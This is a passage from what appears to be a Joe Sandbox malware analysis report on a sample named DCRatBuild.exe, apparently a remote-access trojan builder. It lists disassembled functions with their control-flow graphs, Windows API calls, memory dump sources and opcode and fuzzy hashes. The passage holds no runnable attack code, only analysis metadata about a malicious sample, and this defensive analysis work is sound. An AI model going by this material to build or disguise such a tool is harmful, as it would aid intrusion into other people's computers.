                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                      • Instruction ID: a8663e88b0079f40a373188902437d37d2464dd320d4279437ae141679cb3752
                      • Opcode Fuzzy Hash: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                      • Instruction Fuzzy Hash: A551DE72600216AFFB35AE68CC41FBB77A9EB41760F19422AFC04D6140EB35DC4087B6
                      Function 00D699B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 935 d699b0-d699d1 call d7e360 938 d699d3-d699d6 935->938 939 d699dc 935->939 938->939 940 d699d8-d699da 938->940 941 d699de-d699fb 939->941 940->941 942 d69a03-d69a0d 941->942 943 d699fd 941->943 944 d69a12-d69a31 call d670bf 942->944 945 d69a0f 942->945 943->942 948 d69a33 944->948 949 d69a39-d69a57 CreateFileW 944->949 945->944 948->949 950 d69abb-d69ac0 949->950 951 d69a59-d69a7b GetLastError call d6b66c 949->951 953 d69ac2-d69ac5 950->953 954 d69ae1-d69af5 950->954 959 d69a7d-d69a9f CreateFileW GetLastError 951->959 960 d69aaa-d69aaf 951->960 953->954 956 d69ac7-d69adb SetFileTime 953->956 957 d69af7-d69b0f call d6fe56 954->957 958 d69b13-d69b1e 954->958 956->954 957->958 962 d69aa5-d69aa8 959->962 963 d69aa1 959->963 960->950 964 d69ab1 960->964 962->950 962->960 963->962 964->950
                      APIs
                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D678AD,?,00000005,?,00000011), ref: 00D69A4C
                      • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A59
                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D678AD,?,00000005,?), ref: 00D69A8E
                      • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A96
                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69ADB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$Time
                      • String ID:
                      • API String ID: 1999340476-0
                      • Opcode ID: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                      • Instruction ID: df45e0bcd9f7e63d8a1ad8fda4406a9905c334c66de7dbba18f551ffdc7cd03e
                      • Opcode Fuzzy Hash: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                      • Instruction Fuzzy Hash: D54122705447466FE7208F60CC45BDAFBD8AB05324F14071AF9E8962D1E7B5A988CBB1
                      Function 00D7AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 994 d7ac74-d7ac8d PeekMessageW 995 d7ac8f-d7aca3 GetMessageW 994->995 996 d7acc8-d7accc 994->996 997 d7aca5-d7acb2 IsDialogMessageW 995->997 998 d7acb4-d7acc2 TranslateMessage DispatchMessageW 995->998 997->996 997->998 998->996
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                      • IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                      • TranslateMessage.USER32(?), ref: 00D7ACB8
                      • DispatchMessageW.USER32(?), ref: 00D7ACC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$DialogDispatchPeekTranslate
                      • String ID:
                      • API String ID: 1266772231-0
                      • Opcode ID: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                      • Instruction ID: 84aad7bb71731be651974bad1cd7dc3e2882380b60158fe5ea5572e3d443fbe6
                      • Opcode Fuzzy Hash: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                      • Instruction Fuzzy Hash: F7F0BD7190132BAB8B209BE59C4CDEF7F6CEE453917448416F919D2210EA34D505D7B1
                      Function 00D876BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 999 d876bd-d876ca 1000 d876e8-d87711 call d8b290 GetModuleFileNameA 999->1000 1001 d876cc-d876d0 999->1001 1007 d87718 1000->1007 1008 d87713-d87716 1000->1008 1001->1000 1002 d876d2-d876e3 call d8895a call d88839 1001->1002 1013 d877dc-d877e0 1002->1013 1010 d8771a-d87744 call d877e1 call d87956 1007->1010 1008->1007 1008->1010 1017 d87752-d8776f call d877e1 1010->1017 1018 d87746-d87750 call d8895a 1010->1018 1024 d87771-d8777e 1017->1024 1025 d87787-d8779a call d8ada3 1017->1025 1023 d87783-d87785 1018->1023 1026 d877d1-d877db call d884de 1023->1026 1024->1023 1031 d8779c-d8779f 1025->1031 1032 d877a1-d877aa 1025->1032 1026->1013 1033 d877c7-d877ce call d884de 1031->1033 1034 d877ac-d877b2 1032->1034 1035 d877b4-d877c1 1032->1035 1033->1026 1034->1034 1034->1035 1035->1033
                      APIs
                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\DCRatBuild.exe,00000104), ref: 00D876FD
                      • _free.LIBCMT ref: 00D877C8
                      • _free.LIBCMT ref: 00D877D2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Users\user\Desktop\DCRatBuild.exe
                      • API String ID: 2506810119-2157893583
                      • Opcode ID: ad9a597adefb17207d660d9e279b2aa506d01fd93f952c1c20eb47f4bafbe7d9
                      • Instruction ID: b5ab592ec0b6392d82eee76fb0dbab2e31cd05afb875d2a813e966dedcb4f84e
                      • Opcode Fuzzy Hash: ad9a597adefb17207d660d9e279b2aa506d01fd93f952c1c20eb47f4bafbe7d9
                      • Instruction Fuzzy Hash: 63315C75A04219AFDB21FB999D81DAEBBECEB85710F284066E80497211D6708E40DBB0
                      Function 00D7A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1038 d7a2c7-d7a2e6 GetClassNameW 1039 d7a30e-d7a310 1038->1039 1040 d7a2e8-d7a2fd call d717ac 1038->1040 1042 d7a312-d7a315 SHAutoComplete 1039->1042 1043 d7a31b-d7a31f 1039->1043 1045 d7a2ff-d7a30b FindWindowExW 1040->1045 1046 d7a30d 1040->1046 1042->1043 1045->1046 1046->1039
                      APIs
                      • GetClassNameW.USER32(?,?,00000050), ref: 00D7A2DE
                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D7A315
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D7A305
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                      • String ID: EDIT
                      • API String ID: 4243998846-3080729518
                      • Opcode ID: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                      • Instruction ID: 450c76c7b65f508e573e35fa707cee0da39d2cdaec8d93de3d55241c4f87a899
                      • Opcode Fuzzy Hash: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                      • Instruction Fuzzy Hash: ADF08232A0132977E7205A689C05FEF776C9B86B50F484156BD49E2280E7609946C6F6
                      Function 00D7A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • OleInitialize.OLE32(00000000), ref: 00D7A34E
                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                      • SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                      • String ID: riched20.dll
                      • API String ID: 3498096277-3360196438
                      • Opcode ID: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                      • Instruction ID: 0167060ecd46d655e43e76fd934871d0ad838b29c15c505dff419613055ce05e
                      • Opcode Fuzzy Hash: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                      • Instruction Fuzzy Hash: 7EF0E7B1D0020AABCB10AF99D8499EFFBFCEB95711F00415AE814E2241DBB456098BB1
                      Function 00D7D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1051 d7d287-d7d2b2 call d7e360 SetEnvironmentVariableW call d6fbd8 1055 d7d2b7-d7d2bb 1051->1055 1056 d7d2df-d7d2e3 1055->1056 1057 d7d2bd-d7d2c1 1055->1057 1058 d7d2ca-d7d2d1 call d6fcf1 1057->1058 1061 d7d2c3-d7d2c9 1058->1061 1062 d7d2d3-d7d2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1056
                      APIs
                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: EnvironmentVariable
                      • String ID: sfxcmd$sfxpar
                      • API String ID: 1431749950-3493335439
                      • Opcode ID: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                      • Instruction ID: 6be81edb2da2bd0adcc86ba0cb0132e21e29ad09cd58c478fbcefb8841b13282
                      • Opcode Fuzzy Hash: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                      • Instruction Fuzzy Hash: 7AF0A771801728A7CB212FD4AC0AABA7769EF09741B044562FC8CA6252E661CD41D7F5
                      Function 00D6984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00D6985E
                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D69876
                      • GetLastError.KERNEL32 ref: 00D698A8
                      • GetLastError.KERNEL32 ref: 00D698C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLast$FileHandleRead
                      • String ID:
                      • API String ID: 2244327787-0
                      • Opcode ID: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                      • Instruction ID: 263790307c04b6f6f5ace4e8d251986082cbaf7095d447ed8906b98d66307d76
                      • Opcode Fuzzy Hash: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                      • Instruction Fuzzy Hash: FD117C30900204EBDB209F51C824A79B7ACEB06771F14862AF86AC7690D735DE489F71
                      Function 00D8A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D6CFE0,00000000,00000000,?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue), ref: 00D8A526
                      • GetLastError.KERNEL32(?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000,00000364,?,00D89077), ref: 00D8A532
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8A49B,00D6CFE0,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000), ref: 00D8A540
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                      • Instruction ID: fd72f8855906b274747b9be08f6249ce49ef17ff3ef7b2a733773c4c5f8bca52
                      • Opcode Fuzzy Hash: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                      • Instruction Fuzzy Hash: FB01F736611323ABD7219A6C9C44E567B58AF45BA17140563F90AD3240D731DD40C7F1
                      Function 00D69F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D6CC94,00000001,?,?,?,00000000,00D74ECD,?,?,?), ref: 00D69F4C
                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D74ECD,?,?,?,?,?,00D74972,?), ref: 00D69F8E
                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D6CC94,00000001,?,?), ref: 00D69FB8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileWrite$Handle
                      • String ID:
                      • API String ID: 4209713984-0
                      • Opcode ID: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                      • Instruction ID: 12af2403f7002c85b895a180580d12a5de5ef5a30ba585761da6cc78523c641f
                      • Opcode Fuzzy Hash: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                      • Instruction Fuzzy Hash: 5331E2712083059BDF208F28D858B6AFBA8EF91710F084559F885EB285C775DD49CBB2
                      Function 00D6A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                      Download Yara Rule
                      APIs
                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A22E
                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A261
                      • GetLastError.KERNEL32(?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A27E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CreateDirectory$ErrorLast
                      • String ID:
                      • API String ID: 2485089472-0
                      • Opcode ID: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                      • Instruction ID: 0dc2b45a7e1c8ba7e4dbbc58a7079684b7982b911762bbac5a1e691b3a1100a4
                      • Opcode Fuzzy Hash: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                      • Instruction Fuzzy Hash: 320180311C121467DB229BAD4C55BE97348AF1F781F085452F885F9051DB66CA818EBB
                      Function 00D8AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                      Download Yara Rule
                      APIs
                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D8B019
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Info
                      • String ID:
                      • API String ID: 1807457897-3916222277
                      • Opcode ID: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                      • Instruction ID: efc2a2577bc85becf809975fb62375f38ac332557f072bb3d8718d53a17d3306
                      • Opcode Fuzzy Hash: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                      • Instruction Fuzzy Hash: D84108B050434C9EDF219E68CC95BF7BBA9DB46714F1804EEE59A87142D3359A45CF30
                      Function 00D8A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D8A79D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: String
                      • String ID: LCMapStringEx
                      • API String ID: 2568140703-3893581201
                      • Opcode ID: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                      • Instruction ID: 39b0965649d4ae003e3623ff35d79058c3efd3bea4244900fedbc0c9343a976a
                      • Opcode Fuzzy Hash: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                      • Instruction Fuzzy Hash: 4001D332544209BBDF02AFA4DC05DAE3F66EF08750F054156FE2866160CA729931BBA1
                      Function 00D8A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D89D2F), ref: 00D8A715
                      Strings
                      • InitializeCriticalSectionEx, xrefs: 00D8A6E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CountCriticalInitializeSectionSpin
                      • String ID: InitializeCriticalSectionEx
                      • API String ID: 2593887523-3084827643
                      • Opcode ID: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
